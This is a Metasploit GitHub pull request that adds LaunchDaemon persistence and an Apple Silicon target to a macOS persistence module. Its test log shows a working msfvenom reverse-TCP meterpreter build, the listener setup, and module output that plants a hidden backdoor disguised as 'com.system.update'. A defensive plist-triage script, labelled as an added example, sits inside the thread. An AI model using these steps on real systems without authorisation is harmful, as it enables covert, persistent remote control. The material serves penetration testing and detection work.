Add LaunchDaemon Persistence to exploits/osx/local/persistence.rb #19360

Merged
merged 8 commits into from
Oct 25, 2024


@gardnerapp gardnerapp commented Aug 2, 2024

According to The Art of Mac Malware, Launch Items are able to persist as LaunchAgents or LaunchDaemons. This pull request adds LaunchDaemon persistence to exploits/osx/local/persistence.rb by writing a plist file to ~/Library/LaunchDaemons. One of the advantages of persisting as a LaunchDaemon is that they run before user login and with elevated permissions. Additionally, this pull request adds the ability for the module to target Apple Silicon devices.

As part of the testing I used BlockBlock to catch the plist entry being written. Note if you're using something like LuLu it needs to be turned off as it will catch and terminate meterpreter/shell connections.

I've tested both LaunchAgent and LaunchDaemon persistence with this module on an Apple Silicon device.
$ uname -a
Darwin corey.local 23.1.0 Darwin Kernel Version 23.1.0: Mon Oct 9 21:28:12 PDT 2023; root:xnu-10002.41.9~6/RELEASE_ARM64_T8103 arm64

We start by generating a meterpreter:

$ ../metasploit-framework/msfvenom -p osx/aarch64/meterpreter_reverse_tcp  LHOST=192.168.0.239 LPORT=4444 -o payload -f macho
[-] No platform was selected, choosing Msf::Module::Platform::OSX from the payload
[-] No arch selected, selecting arch: aarch64 from the payload
No encoder specified, outputting raw payload
Payload size: 813091 bytes
Final size of macho file: 813091 bytes
Saved as: payload

Start a listener and reload the module:

msf6> reload_all
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.0.239
lhost => 192.168.0.239
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set payload osx/aarch64/meterpreter/reverse_tcp
payload => osx/aarch64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run

Run the meterpreter:

10:48:22 ~/Desktop $ chmod +x payload && ./payload

Background the session and start to configure the options for persistence.rb:

meterpreter> bg
msf6 exploit(multi/handler) > search osx persistence

msf6 exploit(multi/handler) > use 0
[*] No payload configured, defaulting to osx/x64/meterpreter/reverse_tcp
msf6 exploit(osx/local/persistence) > set target 3
target => 3
msf6 exploit(osx/local/persistence) > set session 2
session => 2
msf6 exploit(osx/local/persistence) > set payload osx/aarch64/meterpreter_reverse_tcp 
payload => osx/aarch64/meterpreter_reverse_tcp
msf6 exploit(osx/local/persistence) > set lhost 192.168.0.239
lhost => 192.168.0.239
msf6 exploit(osx/local/persistence) > set lport 1234
lport => 1234

Test with LaunchAgent. Note that the exploit doesn't technically "complete" because RUN_NOW is false. The plist entry and executable are dropped on the system though, as shown by the pictures below.

msf6 exploit(osx/local/persistence) > run
[*] Started reverse TCP handler on 192.168.0.239:1234 
[*] Dropping backdoor executable...
[+] Backdoor stored to /Users/corery/Library/.vRzmesOZ/com.system.update
[+] LaunchAgent added: /Users/corery/Library/LaunchAgents/com.system.update.plist
[+] LaunchAgent installed successfully.
[*] To remove the persistence, run:
rm -rf /Users/corery/Library/.vRzmesOZ ; rm /Users/corery/Library/LaunchAgents/com.system.update.plist ; launchctl remove com.system.update ; launchctl stop com.system.update

[*] Exploit completed, but no session was created.


Now we test LaunchDaemons by setting `LaunchItem`:

msf6 exploit(osx/local/persistence) > set LAUNCH_ITEM LaunchDaemon
LAUNCH_ITEM => LaunchDaemon
msf6 exploit(osx/local/persistence) > run

[*] Started reverse TCP handler on 192.168.0.239:1234 
[*] Dropping backdoor executable...
[+] Backdoor stored to /Users/corery/Library/.hsKpBATL/com.system.update
[+] LaunchAgent added: /Users/corery/Library/LaunchDaemons/com.system.update.plist
[+] LaunchAgent installed successfully.
[*] To remove the persistence, run:
rm -rf /Users/corery/Library/.hsKpBATL ; rm /Users/corery/Library/LaunchDaemons/com.system.update.plist ; launchctl remove com.system.update ; launchctl stop com.system.update

[*] Exploit completed, but no session was created.
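
For defenders, the artifacts in the test output above (a launch item plist whose program sits in a hidden directory under ~/Library) can be triaged offline with a short script. This is an added example, not code from the pull request or from Metasploit; the sample plist is constructed, and the function names, finding codes and both heuristics are assumptions.

```python
import plistlib
from pathlib import PurePosixPath

# Constructed sample plist. The thread does not show the module's plist, so only
# the label and program path are taken from the test output above.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
  <key>Label</key><string>com.system.update</string>
  <key>ProgramArguments</key>
  <array><string>/Users/corery/Library/.vRzmesOZ/com.system.update</string></array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""


def launch_item_program(item):
    """Return the executable launchd would start, or None if the plist names none."""
    if isinstance(item.get("Program"), str):
        return item["Program"]
    args = item.get("ProgramArguments")
    if isinstance(args, list) and args and isinstance(args[0], str):
        return args[0]
    return None


def triage_launch_item(plist_path, plist_bytes):
    """Return finding codes for one launch item plist (empty list: nothing flagged)."""
    try:
        item = plistlib.loads(plist_bytes)
    except Exception:
        return ["unparseable"]
    if not isinstance(item, dict):
        return ["unparseable"]
    program = launch_item_program(item)
    if program is None:
        return ["no-program"]
    findings = []
    parts = PurePosixPath(program).parts
    # Heuristic 1 (assumption): legitimate helpers rarely live in dot-directories.
    if any(p.startswith(".") for p in parts[:-1]):
        findings.append("hidden-dir")
    # Heuristic 2 (assumption): a LaunchDaemon plist should not point into /Users.
    in_daemons = PurePosixPath(plist_path).parent.name == "LaunchDaemons"
    if in_daemons and parts[:2] == ("/", "Users"):
        findings.append("daemon-program-under-users")
    return findings


if __name__ == "__main__":
    for d in ("LaunchAgents", "LaunchDaemons"):
        path = f"/Users/corery/Library/{d}/com.system.update.plist"
        print(path, triage_launch_item(path, SAMPLE_PLIST))
```

On a live host, feed it the bytes of each plist found in the LaunchAgents and LaunchDaemons directories and review anything that returns a non-empty list.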

@gardnerapp gardnerapp changed the title Osx daemon privesc Add LaunchDaemon Persistence to exploits/osx/local/persistence.rb Aug 2, 2024
@dwelch-r7 dwelch-r7 added the needs-linting The module needs additional work to pass our automated linting rules label Aug 6, 2024

github-actions bot commented Aug 6, 2024

Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. This can be run from the root directory of Metasploit:

rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>

You can automate most of these changes with the -a flag:

rubocop -a <directory or file>

Please update your branch after these have been made, and reach out if you have any problems.

},
'License' => MSF_LICENSE,
'Author' => [ "Marcin 'Icewall' Noga <marcin[at]icewall.pl>", 'joev' ],
'Targets' => [
[ 'Mac OS X x64 (Native Payload)', { 'Arch' => ARCH_X64, 'Platform' => [ 'osx' ] } ],
[ 'Mac OS X x86 (Native Payload for 10.14 and earlier)', { 'Arch' => ARCH_X86, 'Platform' => [ 'osx' ] } ],
['Mac OS X Apple Sillicon', {'Arch' => ARCH_AARCH64, 'Platform' => ['osx'] }],
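
Review bot: On the added Apple Silicon target (last line of this hunk), "Sillicon" is misspelled, and the entry drops the inner padding that the two targets above it use (`[ 'Name', { 'Arch' => ..., 'Platform' => [ 'osx' ] } ]`). Suggest spelling it "Silicon" and matching the existing bracket and brace spacing so the Targets array stays consistent.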

Suggested change
['Mac OS X Apple Sillicon', {'Arch' => ARCH_AARCH64, 'Platform' => ['osx'] }],
['Mac OS X Apple Silicon', {'Arch' => ARCH_AARCH64, 'Platform' => ['osx'] }],

Corey and others added 2 commits August 6, 2024 15:23
Co-authored-by: dwelch-r7 <Dean_Welch@rapid7.com>
@adfoster-r7

Release notes

Adds a new LAUNCH_ITEM option to the exploits/osx/local/persistence module. The allowed values are LaunchAgent or LaunchDaemon. One of the advantages of persisting as a LaunchDaemon is that they run before user login and with elevated permissions. Additionally this pull request adds the ability for the module to target Apple Silicon devices.

@adfoster-r7 adfoster-r7 merged commit 6e1ea92 into rapid7:master Oct 25, 2024
37 checks passed
@adfoster-r7

Super cool, thanks!

@adfoster-r7 adfoster-r7 added rn-payload-enhancement release notes for enhanced payloads and removed needs-linting The module needs additional work to pass our automated linting rules labels Oct 25, 2024
@adfoster-r7 adfoster-r7 added rn-enhancement release notes enhancement and removed rn-payload-enhancement release notes for enhanced payloads labels Nov 15, 2024